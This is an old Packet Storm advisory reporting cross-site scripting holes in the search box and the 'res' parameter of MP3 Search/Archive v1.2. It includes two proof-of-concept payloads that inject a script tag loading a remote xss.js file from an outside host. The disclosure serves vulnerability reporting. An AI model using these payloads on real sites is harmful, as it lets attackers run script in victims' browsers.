mp3search.txt

2006-06-25T00:00:00
ID PACKETSTORM:47614
Type packetstorm
Reporter Luny
Modified 2006-06-25T00:00:00

Description

                                        
                                            `MP3 Search/Archive v1.2  
  
Homepage:  
http://www.bloodys.com  
  
Affected files:  
Search input box.  
index.php  
  
Data is not properally sanatized before its generated. For PoC try putting the code below in the search box:  
  
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>  
  
  
Screenshots:  
http://www.youfucktard.com/xsp/mp3search.jpg  
  
XSS vuln via res variable on index.php.  
  
PoC:  
http://www.example.com/search/index.php?letter=O&p=2&res=92">">">">'>'><"">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<'<'  
  
Screenshots:  
http://www.youfucktard.com/xsp/mp3search2.jpg  
http://www.youfucktard.com/xsp/mp3search3.jpg  
`